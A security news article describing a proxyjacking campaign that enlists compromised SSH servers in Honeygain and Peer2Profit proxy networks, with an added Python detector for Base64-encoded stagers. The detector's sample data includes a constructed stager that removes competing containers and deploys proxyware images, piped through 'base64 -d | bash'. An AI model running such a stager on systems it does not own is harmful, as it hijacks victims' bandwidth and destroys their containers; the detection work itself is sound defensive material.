A newly discovered proxyjacking campaign exploits publicly exposed SSH servers to earn revenue through proxyware services. These services let the operators profit from compromised servers by selling their unused internet bandwidth.
Researchers compare these attacks to cryptojacking, in which attackers use compromised systems to mine cryptocurrency. Proxyjacking, by contrast, is a low-risk, high-reward way of siphoning an infected device's resources: instead of burning CPU on mining, it sells the device's spare bandwidth.
Proxyjacking is also harder to detect. Because it consumes only a compromised system's unused bandwidth and does not affect its overall usability, threat analysts may struggle to spot it from performance symptoms alone.
The campaign's operators focus on monetising their access even though they have other options. Investigators note that the compromised devices could also serve as proxies to conceal the attackers' own traces and malicious activity; instead, the adversaries concentrate on the income from commercial proxyware services.
Threat analysts say the active campaign uses SSH for remote access and runs malicious scripts that quietly enlist victim servers in a peer-to-peer proxy network such as Honeygain or Peer2Profit.
This lets the threat actors earn revenue from unsuspecting victims' bandwidth with little chance of attracting analysis. A separate researcher found a list, shared on an online forum, that contained the IP address which started the investigation alongside at least 16,500 other proxies.
The researchers first observed the attacks last June, after several SSH connections were made to honeypots run by an undisclosed company's SIRT. Once connected to a honeypot, the attacker launched a Base64-encoded Bash script that enrolled the compromised system in the Peer2Profit or Honeygain proxy network.
The script pulls the Honeygain and Peer2Profit Docker images, starts them as containers, and kills competing bandwidth-sharing containers already running on the host.
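As an added example (not code from the researchers or from the article), the following Python detector looks for the staging pattern described above: a recorded SSH session command that decodes a Base64 blob straight into a shell, where the decoded payload pulls proxyware images or removes competing containers. It also includes a host-side check over `docker ps` output. The command-log shape, the image and container names, and all sample data are assumptions made for illustration.

```python
"""Spot SSH session commands that decode a Base64 payload into a shell, then
inspect the decoded payload for the proxyware deployment pattern described
above (docker image pulls for bandwidth-sharing services, removal of
competing containers). Added example; the command-log shape, image names and
sample data are assumptions, not artefacts from the campaign."""
import base64
import binascii
import re

# Proxyware services named in the article. Substring, case-insensitive match,
# so an image reference such as "honeygain/honeygain" (assumed name) is caught.
PROXYWARE_INDICATORS = ("honeygain", "peer2profit")

B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")        # candidate Base64 blob
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
CONTAINER_KILL = re.compile(r"docker\s+(?:rm\s+-f|kill|stop)\b")
IMAGE_DEPLOY = re.compile(r"docker\s+(?:pull|run)\b")


def decode_payloads(command):
    """Return every Base64 run in the command that decodes to UTF-8 text."""
    payloads = []
    for match in B64_RUN.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            payloads.append(raw.decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not really Base64, or a binary blob: ignore
    return payloads


def analyse_command(command):
    """Classify one recorded command using its visible text and any decoded payload."""
    finding = {"b64_to_shell": bool(DECODE_TO_SHELL.search(command)),
               "proxyware": [], "kills_containers": False, "deploys_images": False}
    for text in [command] + decode_payloads(command):
        lowered = text.lower()
        for indicator in PROXYWARE_INDICATORS:
            if indicator in lowered and indicator not in finding["proxyware"]:
                finding["proxyware"].append(indicator)
        finding["kills_containers"] |= bool(CONTAINER_KILL.search(text))
        finding["deploys_images"] |= bool(IMAGE_DEPLOY.search(text))
    # An encoded stager combined with proxyware names or container cleanup is
    # the pattern worth alerting on; an encoded stager alone is a weak signal.
    finding["suspicious"] = finding["b64_to_shell"] and (
        bool(finding["proxyware"]) or finding["kills_containers"])
    return finding


def scan_commands(records):
    """records: iterable of (source_ip, command) pairs. Returns the suspicious ones."""
    hits = []
    for source_ip, command in records:
        finding = analyse_command(command)
        if finding["suspicious"]:
            hits.append((source_ip, finding))
    return hits


def running_proxyware(docker_ps_output):
    r"""Host-side check over `docker ps --format '{{.Names}}\t{{.Image}}'` output
    (tab-separated name and image per line): return the proxyware containers."""
    found = []
    for line in docker_ps_output.splitlines():
        if "\t" not in line:
            continue
        name, image = line.split("\t", 1)
        if any(ind in image.lower() for ind in PROXYWARE_INDICATORS):
            found.append((name, image))
    return found


# Constructed sample data (not from the campaign). The stager mirrors the shape
# the article describes; container and image names are invented for illustration.
STAGER_SCRIPT = """#!/bin/bash
docker rm -f $(docker ps -q --filter name=otherproxy) 2>/dev/null
docker pull honeygain/honeygain
docker run -d --restart=always --name hg honeygain/honeygain
docker pull peer2profit/peer2profit_linux
"""
_stager_b64 = base64.b64encode(STAGER_SCRIPT.encode()).decode()
_benign_b64 = base64.b64encode(b"apt-get update && apt-get -y upgrade\n").decode()

SAMPLE_COMMANDS = [
    ("198.51.100.10", "uptime"),
    ("198.51.100.10", "echo %s | base64 -d | bash" % _stager_b64),
    ("203.0.113.5", "echo %s | base64 -d | bash" % _benign_b64),   # encoded but harmless
    ("203.0.113.9", "docker ps"),
]

SAMPLE_DOCKER_PS = "web\tnginx:1.25\nhg\thoneygain/honeygain:latest\n"

if __name__ == "__main__":
    for source_ip, finding in scan_commands(SAMPLE_COMMANDS):
        print(source_ip, finding)
    print(running_proxyware(SAMPLE_DOCKER_PS))
```

Decoding the blob rather than matching only on the visible command is the point: the proxyware names never appear in plain text on the wire, so a signature on `echo ... | base64 -d | bash` alone would fire on benign automation as well, which is why the benign encoded command in the sample is not flagged.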
Finally, the researchers also found cryptocurrency miners used in cryptojacking attacks, along with exploits and hacking tools, on the compromised server that hosted the malicious script. This suggests that the operators have either moved fully from cryptojacking to proxyjacking or use proxyjacking as a supplementary source of income.